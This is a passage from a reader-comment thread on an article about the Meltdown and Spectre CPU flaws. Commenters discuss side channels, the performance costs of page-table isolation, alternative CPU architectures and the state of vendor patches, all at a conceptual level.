Well, with the current state of affairs, everything is possible (vide WebUSB).

Thanks.

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:13 UTC (Thu) by mtanski (subscriber, #56423) [Link]

If you're generating live audio in the browser you need sub ms precision. After all 44.1kHz is ~44 samples per ms.

Notes from the Intelpocalypse

Posted Jan 4, 2018 18:20 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

I wouldn't dare to think that you can build audio samples in JavaScript.
What about latency? Are the browsers using some real-time scheduling?

My assumption is that performance.now() is a JavaScript thing,
but I haven't verified this.

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:41 UTC (Thu) by mtanski (subscriber, #56423) [Link]

If it can be done somebody has done it in JS. There's even a browser audio API: http://papers.traustikristjansson.info/?p=486

Separate privileges, separate caches

Posted Jan 4, 2018 9:07 UTC (Thu) by epa (subscriber, #39769) [Link]

Since cache timing will always be visible to code (unless you mandate a restricted programming language that cannot precisely measure its own time taken) the only way to fix this in general is to have separate caches for each separate privilege level. As a minimum one for kernel mode and one for user mode. As a small improvement, kernel mode could read the userspace cache (but not write to it) while userspace would have no access to the kernel cache at all.

Since CPUs don't currently support this, the way to emulate it is to flush the cache on each context switch from kernel to user space. This would slow things down. It might require rewriting some kernel APIs to be 'fatter' so that a single call does more work before returning, and you don't need as many context switches.

Separate privileges, separate caches

Posted Jan 4, 2018 11:28 UTC (Thu) by excors (subscriber, #95769) [Link]

These attacks are using the cache as a side channel to leak data from the speculatively-executed instructions to the non-speculative world, but I don't think that's the only possible side channel. E.g. maybe you could use a variable-speed instruction like division ("1 / (v & 1)" etc) and use another hyperthread to measure how long the execution unit is busy for. Or maybe you could use a constant-speed expensive SIMD instruction where certain input values cause lots of transistors to flip between 0s and 1s repeatedly, generating more heat, so you run it in a loop then measure the temperature of the CPU core. (Maybe that one is less plausible). The cache is completely irrelevant in those cases, so you can't fix it by changing the cache design.

Separate privileges, separate caches

Posted Jan 4, 2018 16:06 UTC (Thu) by epa (subscriber, #39769) [Link]

Wasn't there already a known information leak with hyperthreading, leading the OpenBSD developers to recommend that you disable it?

Perhaps the cache is not the only thing that lets you snoop but it is certainly a major one.

Separate privileges, separate caches

Posted Jan 4, 2018 21:45 UTC (Thu) by emaste (guest, #121005) [Link]

You may be thinking of the hyperthreading cache side-channel reported by Colin Percival, with a mitigation first in FreeBSD back in 2005. Those details are at http://www.daemonology.net/hyperthreading-considered-harm..., and the paper is at http://www.daemonology.net/papers/htt.pdf.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:09 UTC (Thu) by olivlwn (guest, #100387) [Link]

Well done !

Regarding pti, based on articles on Phoronix it seems that the performance cost is not so bad. TBC.

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:50 UTC (Thu) by nix (subscriber, #2304) [Link]

Typical Phoronix article though. Video encoding and compiling aren't much affected: well, of course not, they hardly transition to kernel space at all! FSMark drops by more than 50% in some tests. 50%! From a single mitigation!

Sorry, if you do anything with the fs the performance cost is clearly appalling, since FSMark isn't *that* synthetic: things like big find(1)s are fairly similar to FSMark in that all they really do is ask the kernel for things lots and lots of times. (Of course, they are also disk-bound operations, so maybe the performance cost is only visible once you have a hot cache, or if you use an SSD.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 12:15 UTC (Thu) by bojan (subscriber, #14302) [Link]

If I remember correctly, these figures are similar to what grsecurity was getting with du -s. Pretty scary to think that some things may take twice the time, but that seems to be the reality...

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:32 UTC (Thu) by ortalo (guest, #4654) [Link]

Why scary? It depends. For example, I would love to see the duration between my birth and my death take twice the time. than originally specified...
But joke aside, this performance penalty has to be balanced against the actual security needs - and you may try alternative implementations (e.g. with another CPU, another software configuration, etc.).

Notes from the Intelpocalypse

Posted Jan 4, 2018 13:45 UTC (Thu) by MarcB (subscriber, #101804) [Link]

In general, any workload in which fixed costs of syscalls are a significant share, will be impacted strongly.

This can be filesystem, but also socket operation, or - as it turns out - mprotect.

On one system I am observing about 10 millionen calls to mprotect per minute (not sure, if this is sane). The workload should theoretically be low on syscalls, but it is not. mprotext is followed by futex, nanosleep and then the expected read at around 160k/minute.

Perhaps, a good thing that will come of this is a review of some applications use of syscalls.

The following can give you an idea. It will sample for 60 seconds:
perf stat -e 'syscalls:sys_enter_*' -a sleep 60 2>&1 >/dev/null | sort -n

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:20 UTC (Thu) by mtanski (subscriber, #56423) [Link]

Video/audio encoding, gaming other mostly CPU bound applications will be minimally impacted. Applications that do a lot of syscalls will be impacted quite a bit.

My estimate is about 10% to 15% in real world OLTP database workloads. Databases end up doing a mixture of network / disk IO. Most OLTP queries are getting / returning a handful of tuples so execute time is not dominated by CPU by disk IO. There's usually also a random read pattern (btrees, index indirection). The faster the disk device (100k+ IOPS device) the more impact this will have.

To make this into a one-two punch the KPTI mitigation requires flushing of the TLB. Databases often end doing quite a bit of caching in userspace again with non-ideal locality (random placement) so this will further impact it.

Notes from the Intelpocalypse

Posted Jan 6, 2018 19:07 UTC (Sat) by JanC_ (guest, #34940) [Link]

This looks pretty bad too:
https://www.epicgames.com/fortnite/forums/news/announceme...

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:17 UTC (Thu) by jtaylor (subscriber, #91739) [Link]

Speculative execution has been around in cpus for more than a decade and timing attacks on cpu caches are not new either. I wonder why it took so long to figure this flaw out. Is there something else new involved in these attacks?

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:53 UTC (Thu) by marcH (subscriber, #57642) [Link]

> Is there something else new involved in these attacks?

Attention to security issues and funding of research grew from basically zero to almost measurable?

Even today old and unsafe programming languages are still the most popular and closed source software is still king.

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:25 UTC (Thu) by gdt (subscriber, #6284) [Link]

Is there something else new involved...

What's new is the people. When crypto instructions arrived in CPUs cryptography researchers bought their concerns with side-channels with them when analysing the CPU's crypto implementations (eg, CacheBleed). They then applied those side-channel concerns to other aspects of CPU security. What's new here is using speculative execution as the side-channel (and discovering a more severe flaw in Intel CPUs whilst doing that work).

As usual there's a small number of academic cryptographers and computer scientists at the beginning of the trouble. A good start would be the papers here. On the plus side, they've reclaimed the phrase "industry disruption" from its misuse by venture capitalists.

Those researchers are of the view that microarchitecture design lacks design rigour, which is the usual approach taken by cryptographic semiconductor designers to limit side channels. Re-engineering semiconductor design processes to add such rigour after the fact isn't going to be a fast or fun ride.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:09 UTC (Thu) by excors (subscriber, #95769) [Link]

> What's new here is using speculative execution as the side-channel

It seems to me like the side channel is simply the cache, which was already well known as a way for two malicious processes to communicate, and as a way for a malicious process to spy on the memory-access behaviour of an innocent process.

What's new is that an innocent process can be tricked into (speculatively) fetching sensitive data then revealing that data through some side channel, because the CPU's speculative execution will happily ignore the innocent code's validity checks that should have restricted what data it can fetch, or will happily ignore the innocent code's intended control flow and start executing arbitrary instructions. A similar attack could (in theory) work with other non-cache-related side channels to leak the data once it's been fetched.

Also what's new is someone doing the proof-of-concept work to demonstrate it's a real problem, rather than just expressing vague suspicions about how dodgy the whole thing feels.

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:07 UTC (Thu) by ortalo (guest, #4654) [Link]

It's probably covert channel then here, as in J. K. Millen, “Covert Channel Capacity”, in IEEE Symposium on Security and Privacy, Oakland, 1987.
Covert channels identification and control was already in the TCSEC security evaluation criteria in the 80s (the so-called "Orange Book") for multilevel security operating system, so, even if the present concerns are indeed new - the whole problem does sound in fact very old to me.
In secure multiuser (or more precisely multiprogramming IIRC) systems, covert channels may exist wherever a shared resource exists between programs running at different security levels. Obviously, current systems have much more shared resources between processes (at much higher frequencies) than in the past: cpus, threads, caches (multiple levels), etc. so the opportunity for covert channels existence is very high. And virtualization systems only widen the possibility for untrusted code to demand code execution in more privileged context.

Finally, the biggest security concern for me is not the existence of these vulnerabilities but another question: why in the hell have these old security requirements been put aside deliberately for 2 decades? Only really young people should have an excuse for ignoring those unwillingly (and they have none anymore ;-).

As an added comment, note these issue surface and gain traction because exploits are implemented. Why not put more effort into protecting our systems from covert channels instead of, once again, starting by investing time into breaking them with tricky low level programming?

Notes from the Intelpocalypse

Posted Jan 4, 2018 19:12 UTC (Thu) by mtaht (guest, #11087) [Link]

As I recall, the only way to get a B1 rating was to disable networking entirely. Even C2 was hard - and it was so long ago (90?) for me that I cannot remember the requirements or differences between these levels. Though I think this year might be a good time to re-read them.

I do seem to recall that databases had to have *row-level* security labels... but my opinion then, as now, was that orange book was unimplementable for usable systems.

Notes from the Intelpocalypse

Posted Jan 5, 2018 9:38 UTC (Fri) by ortalo (guest, #4654) [Link]

I think your summary is too negative. Admittedly, the Orange book (and the general requirements of academic) security requirement have always been high and ambitious ; but the primary reason they appear today to be unachievable is because so many people lowered their own security requirements so low in the meantime that decades old objectives sound impossible.
B1 (or ITSEC E5+ or CC EAL5+) systems is achievable with networking - of course. Orange book et al. requirements are too old to be used as-is but the way they have been built and designed should not have been thrown away carelessly as, IMHO, they were much more pertinent to computer security than many recent useless recipes. E.g. I keep on repeating that vulnerability analysis is only the last ten percent of the security work and the most effort should be spent on protection design, not breaking thing. Yes, I know, I said it once again - it must be senility luring. (or is it disinformation?:-)
And sometimes the tools are even already here. The main difference between B and C levels is the multilevel mandatory policy. Mandatory policy mechanisms have come back in mainstream Linux systems. Row level security mechanisms are available in mainstream PostgreSQL, etc. And eveyone sees that they are not so easy to use as is, so more work would needed to make them usable. But in fact, very logically given the technology improvements, some implementations have already advanced much further than what these decades old standards were proposing.
What is misleading is the way the general objective of computer security has been twisted. The end user should trust the system. Several lines of defense should be installed. Security kernels (TCBs) and their properties should be well defined (and realistic). Security documentation should be available (including for the vulnerabilities). These objectives were present in the old books. Hopefully they are still present in many works but they do not seem to gather the most valuable effort (typically money). Maybe they were not as well defined as their writers thought - but I also think too few people fought for them.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:56 UTC (Thu) by cesarb (subscriber, #6266) [Link]

> because the CPU's speculative execution will happily ignore the innocent code's validity checks that should have restricted what data it can fetch, or will happily ignore the innocent code's intended control flow and start executing arbitrary instructions.

The most fascinating part is that this is an "impossible execution": you have code which can never read out of bounds, since every possible flow into it checks the bounds; yet, in some imaginary world dreamed by the CPU's pipeline, the out of bounds read actually happens.

That reminds me of undefined behavior, which is also something which by its definition cannot ever happen (and compilers optimize accordingly), yet sometimes happens, leading to bizarre results following some sort of dream logic.

Notes from the Intelpocalypse

Posted Jan 5, 2018 9:51 UTC (Fri) by ortalo (guest, #4654) [Link]

It is fascinating until the associated CPU starts to talk about driving the car, landing the plane, counting the ballots, talking to the kids in their bedroom, policing the street and more generally acting on your behalf all the time. Then the fascination turns into fear. Not of the CPU itself by the way - but of the way other humans could take advantage of this undefined behaviour.

Notes from the Intelpocalypse

Posted Jan 5, 2018 8:12 UTC (Fri) by Yenya (subscriber, #52846) [Link]

> Is there something else new involved in these attacks?

Two things:

- widespread use of virtualization ("cloud computing"), i.e. running someone else's native code on our CPUs.
- widespread use of JIT engines in Javascript and other languages, in which - again - someone else's code is run on our CPUs.

Notes from the Intelpocalypse

Posted Jan 5, 2018 23:41 UTC (Fri) by kiko (guest, #69905) [Link]

C'mon, our CPUs are always running somebody else's code. Do you think third-party code was safer in the DOS days? That's not the issue at hand. The problem is that CPUs and software have gotten so complex that our established security patterns -- for instance userspace/kernel separation -- are becoming increasingly insufficient to provide a reasonably secure computing environment.

And yeah, having so many computers and services addressable on the Internet provides scale for making complex or expensive attacks realistic to the point of being trivial.

Notes from the Intelpocalypse

Posted Jan 4, 2018 10:47 UTC (Thu) by flussence (subscriber, #85566) [Link]

Time to re-re-re-relearn an important lesson: letting random strangers run arbitrary code on Someone Else's Computer is dangerous. Especially if that someone else is you, and you're not aware it's happening.

For browser authors: you went out of your way to make life exceptionally difficult for people who don't want to be involuntarily opted in to this kind of blind trust, and kept digging this hole after Rowhammer. Is it worth it for this kind of fallout? Will it be worth whatever comes next?
Would be poetic justice if one of the first uses of this exploit was to leak EME private keys.

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:20 UTC (Thu) by roc (subscriber, #30627) [Link]

It's not exceptionally difficult to disable Javascript.

Even if removing Javascript from the browser entirely was a good idea in the abstract, there are a couple of problems. One is that all users would immediately switch to a competitor browser, possibly an earlier version from the same vendor.

Another, even deeper problem is that the only alternative to run-by-default execution of untrusted code is some kind of trusted gatekeeper like the app stores have. (Don't say users should decide; they mostly can't.) But those gatekeepers don't work very well, and they put too much power in the hands of Google and Apple.

Notes from the Intelpocalypse

Posted Jan 6, 2018 18:52 UTC (Sat) by flussence (subscriber, #85566) [Link]

I know a JS-free web will never happen, it's too impractical, it's some people's dayjob, etc. The sky is falling, I don't have a good answer and I don't expect anyone does right now.

Maybe we could, for a start, treat CPU-hungry webpages with a bit more paranoia than passive event-driven ones? There's sufficient fine-grained security for the latter group but all we've had for the former is sledgehammers like NoScript, or whack-a-mole solutions like that one coinhive blocking extension. Enumerating badness isn't sustainable, there has to be a better way.

I wouldn't mind having less reasons to allow JavaScript in the first place though. Google should be busy restoring their MathML support after this week, for one.

Notes from the Intelpocalypse

Posted Jan 4, 2018 13:35 UTC (Thu) by freemars (subscriber, #4235) [Link]

Jon, I'm glad you (and the kernel crew) are on this. Someone needs to care about security... even if Intel doesn't.

Could paranoid applications (i.e. all of Tails) take advantage of the unlikely() directive to force the CPU to take the longer route every time and stop timing attacks?

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:25 UTC (Thu) by Paf (subscriber, #91811) [Link]

No, most obviously because that directive is optional and is ignored (or compiled out, I think) when it suits the CPU.

Also, I don’t think that would work anyway - you could force the speculative execution down a particular path but it isn’t necessarily the right one. Someone could still exploit that. Right...?

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:47 UTC (Thu) by excors (subscriber, #95769) [Link]

unlikely()/__builtin_expect() doesn't force anything - it's just a hint to the compiler, which might arrange code more efficiently and might emit instructions with hints for the CPU (which the CPU might use or ignore).

The "variant 1" attack seems to rely on the target process(/kernel) containing code that reads memory from an attacker-controlled address, after checking the address for validity. The CPU might speculatively perform the read and process that data in an observable way, even if the validity check fails and it's reading sensitive data. To prevent that, I guess you need to put something between the validity check and the read to prevent speculation, like a "cpuid" instruction on x86. But that can be very expensive (hundreds of cycles), and I don't know how you'd find all the places you need to put it.

The "variant 2" attack seems to rely on the target process(/kernel) containing an indirect jump instruction, which can be tricked into predicting an attacker-controlled location and speculatively executing dangerous code. It sounds like the -mindirect-branch=thunk-extern GCC patches could be enough to prevent that.

We need alternate approaches

Posted Jan 4, 2018 14:37 UTC (Thu) by mtaht (guest, #11087) [Link]

I have been saying for many years now, that the system is rotten to its cores, and lines of research that we'd had in the 90s (like capabilities architectures) needed to be resumed, tools for creating hardware made more robust and open, and critical systems protected by diversity in the ecosystem.

Last night, after reading the relevant papers on these new attacks, I started
reminiscing fondly of the days when I used to use an old DEC alpha as
a firewall merely because I had more confidence it would be harder to
exploit than anything else, just by being different.

I can't help but reflect on my favorite (sadly, still slidewire) alternate cpu's characteristics, the mill cpu.

It's a single address space in the first place (no aliasing), protection of memory
is to the byte, not the page (and done in a separate unit than the TLB) - and the cache is virtual, not physical.

There are no syscalls, per se', instead an explicit (and fine grained) capability gaining
(or dropping) portal call almost exactly like a subroutine.

The stack is protected from ROP. Stack and registers have no rubble left behind
(there are few registers, as we know them, either) that can be peered
at on call or return, and further malloc and free can be jiggered to not reuse memory quickly, or always return zeroed memory, at a usable and very low cost.

The mill equivalent of speculative execution is an intrinsic, well
documented part of the exposed processor pipeline: an explicit value
(NAR = not a result) is dropped on "the belt" there is the equivalent of
failed speculative execution. There isn't a conventional BTB, either (branch
exits are predicted via an undefined mechanism).

In short, I think the mill, as the closest thing to a pure capabilities arch that exists
today, could have (at least on paper) been invulnerable to this string
of attacks. (but of course, vulnerable to other things not yet thunk up).

There are of course many other possible arches and ideas out there, the important thing is to recognize that it's long past time to try building them rather than endlessly patching warts on top of warts.

PS:

And I'm hating the workarounds posted thus far, because, latencies
are going to jump once again on servicing interrupts, and
that breaks a lot of assumptions in (for example) the virtualized
networking space, and interrupt handling and context switches were already orders of
magnitude too slow for my taste and favorite user facing applications.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:49 UTC (Thu) by JFlorian (guest, #49650) [Link]

I'm not going to claim I understand any of this all that well, but it is clearly going to prove a significant disruption. It's also clear that complexity got the better of us and I fear it will be "resolved" through ever more complexity.

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:21 UTC (Thu) by ortalo (guest, #4654) [Link]

I am not sure this will disrupt much in the near term. So many users are so used to seeing their computing devices security compromised that they do not even complain anymore.
Plus the fact that hardware vendors do not seem to me as the biggest culprits here. Why was speculative execution introduced in the first place? Because software programmers did not want to use complex compilation techniques (involving, e.g. data profiling or variants programming) and the software industry did not want to pay for advanced devleopment tools (and possibly new languages, new compilers, etc.). Hardware-level runtime optimization was seen as good enough. Well, it may be, but maybe you lose more in the process than you think (especially predictability).

"Good enough" has always been a very problematic strategy for security-critical computing. But why would such a state of fact be perturbed? (I hope it will be, but I do not see why unless all users finally start to see some kind of new light and put actual money on it - or more probably out of not good enough systems and teams.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:30 UTC (Thu) by epa (subscriber, #39769) [Link]

Intel did have a good try at removing speculative execution from the processor: with Itanium, as I understand it, any speculative load instructions have to be put in by the compiler explicitly. As you say, it didn't take off because nobody could be bothered to switch to the advanced compiler technology needed. (Well, there may be other reasons why Itanic sank, and in some ways we are better off not having an Intel-proprietary instruction set, but certainly industry inertia was part of it.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:23 UTC (Thu) by pizza (subscriber, #46) [Link]

> Because software programmers did not want to use complex compilation techniques (involving, e.g. data profiling or variants programming) and the software industry did not want to pay for advanced devleopment tools (and possibly new languages, new compilers, etc.).

That's disingenuous.

The simple fact of the matter that those "complex compilation techniques" didn't exist at the time, and still don't exist today. And it's not for the lack of trying. Intel spent many billions of dollars trying to make this work, and made some progress -- but it turned out that the hardware could do a better job at runtime than the compilers could at compile-time -- because, as it turns out, at runtime one has the advantage of knowing the *data* the software is dealing with, while at compile-time one doesn't.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:57 UTC (Thu) by roc (subscriber, #30627) [Link]

This is completely right.

Also, Itanium would not have been immune to Spectre. Itanium included speculative load operations, and in the "Spectre variant 1" attack, the compiler might well have hoisted the problematic loads above the bounds check precisely to get the performance benefit that an out-of-order CPU gets by speculatively executing those loads.

Notes from the Intelpocalypse

Posted Jan 5, 2018 6:59 UTC (Fri) by epa (subscriber, #39769) [Link]

Right - but on Itanium it would be more straightforward to fix, since you could set a compiler flag to just remove speculative load instructions from the kernel (as a quick fix), adding them back where they are proven safe. Indeed, the compiler could be taught not to speculatively lift loads outside bounds checks.

In user space, I imagine that the explicit speculative load instruction used on Itanium does do all the same memory access checking as an ordinary non-speculative load, so it can't be used to snoop in the same way as the hidden speculative execution on x86_64.

Notes from the Intelpocalypse

Posted Jan 5, 2018 10:12 UTC (Fri) by ortalo (guest, #4654) [Link]

Well, maybe I am a somehow disingenuous, admittedly back then the hardware-based solutions looked better, but I have to question everything, including the fact that the most prominent hardware vendor of that time really did try to favor software development tools rather than its own silicon-oriented intellectual property, don't you think?
Anyway, I would love to be proven wrong and see some of this past research resurrect into a nice powerfull-enough deterministic processor and the associated innovative software development environment for current and near-future critical systems. In my opinion, it is the right time now and many would certainly consider helping it (in good faith I assure you ;-).

Notes from the Intelpocalypse

Posted Jan 5, 2018 11:16 UTC (Fri) by roc (subscriber, #30627) [Link]

Your second paragraph seems to be talking about Meltdown, but Spectre 1 is still a problem for user-space applications. It is probable that Meltdown wouldn't have worked on Itanium.

FWIW in C I don't think it's easy to tell what is a bounds check and which loads are guarded by which checks.

I agree that it would be a bit easier to fix these specific issues in Itanium. I don't think that makes this a "Itanium should have won!" moment.

Notes from the Intelpocalypse

Posted Jan 7, 2018 16:02 UTC (Sun) by mtaht (guest, #11087) [Link]

The discussions over at comp.arch have been quite informative,(https://groups.google.com/forum/#!forum/comp.arch)

And it does look like the mill was invulnerable by design to spectre/meltdown. They did find and fix a bug where the compiler could lift a memory access ahead of its guard, but near as I can tell that would have caused a segfault rather than a permissions violation.

Does Red Hat's updates fix everything?

Posted Jan 5, 2018 1:50 UTC (Fri) by dowdle (subscriber, #659) [Link]

Red Hat mentions three CVEs that are fixed. The three issues they talk about are very similar to those mentioned by Jon. I can't say I did a really good comparison but I skimmed it well enough hopefully.

Anyway, Jon said:

Getting around boundary checks - "There is no straightforward defense to this attack, and nothing has been merged to date."

Messing with indirect jumps - "As of this writing, no defenses have actually been merged into the mainline kernel."

Forcing direct cache loads - "The answer here is kernel page-table isolation"

So... given Red Hat's updates and their reported fixing everything (although saying that software isn't a complete fix for the hardware issues)... has Red Hat come up with their own fixes? Are they using something that was submited but not yet accepted by upstream? What? Do these fixes actually work for the first two or not? I guess the proper folks to ask would be Red Hat but I'm sure there are plenty of people here who would like to know the answers too. Hopefully someone can elaborate because there is a lot of confusion going around... and lots of articles and whatnot... but not sure what is accurate signal and what is noise.

Does Red Hat's updates fix everything?

Posted Jan 5, 2018 4:43 UTC (Fri) by roc (subscriber, #30627) [Link]

The situation is incredibly confusing even if you spend significant time trying to follow the details.

You've got Intel releasing microcode updates (when?) and basically saying "we've fixed everything", various Linux kernel patches in flight, and Amazon and Google saying "we've fixed all our stuff", yet it's completely unclear what mitigations are actually being deployed, which bugs they think they're fixing, and what they're assuming everyone else has to do. Meanwhile it's very clear from the Spectre paper that the attacks they and Project Zero identified are probably just the tip of an iceberg. What's being done about the iceberg?

Does Red Hat's updates fix everything?

Posted Jan 6, 2018 2:09 UTC (Sat) by rahvin (guest, #16953) [Link]

What's being done about the iceberg?

The first mates (there is no captain) are panicking and trying to figure out where the iceberg is and how big it is but understand it's the middle of a night in a fog bank and they might not know for quote a while, the Barrelman saw the iceberg and wrote a report about it but wasn't quite sure if they saw the whole thing or even if there is more than one, the sailors are trying to patch the hole dumping water into the boat from the first strike but all they've got to fix the hole is some leftover bread, the engineer in the engine room claimed he already avoided the iceberg and has issued a full steam ahead order and the 200 helmsmen are busy steering in some direction they think the iceberg isn't.

Meanwhile the half the press is running up and down the deck yelling that everyone is dead, the other half is telling everyone there is nothing to worry about and the passengers are in the dining room without a care in the world.

Does Red Hat's updates fix everything?

Posted Jan 6, 2018 18:38 UTC (Sat) by bronson (subscriber, #4806) [Link]

And there may be one iceberg or there may be hundreds -- we can't tell now. These icebergs are catastrophic for some boats but pretty much irrelevant for others. And the proposed solutions will cut the top speed of all boats by 7 to 30%. Or 2 to 12%, or 10 to 50, or something. Depends on when you ask, the numbers are changing daily.

We don't even know if the icebergs have their own power and can hunt down boats on their own.

Notes from the Intelpocalypse

Posted Jan 5, 2018 8:31 UTC (Fri) by tdz (subscriber, #58733) [Link]

Excellent article, thank you.

Notes from the Intelpocalypse

Posted Jan 17, 2018 15:28 UTC (Wed) by mopcua (guest, #121648) [Link]

"An exploit can fetch the data at both 0x200 and 0x300 and compare the timings."

How can the exploit fetch this data? Is it in user space or is he doing it via some getter provided by the kernel?

Notes from the Intelpocalypse

Posted Jan 17, 2018 15:48 UTC (Wed) by excors (subscriber, #95769) [Link]

You wouldn't want to really use 0x200 - that's just a simplified example of the concept. You'd use an address that is mapped into the attacker's userspace process, so the attacker can trivially read it. The Project Zero example does an eBPF array access with a bogus index that points to a massively-out-of-bounds element at a userspace address.

Notes from the Intelpocalypse

Posted Jan 19, 2018 14:40 UTC (Fri) by brokenstapler (guest, #121720) [Link]

The Meltdown fix is not nearly going as well as expected. Intel made a comment that explained a bit about what's going on and how the fix isn't going as smoothly as one might have hoped. Further reading is available if you want (Ars, HN, etc) but it's just going to make you sad.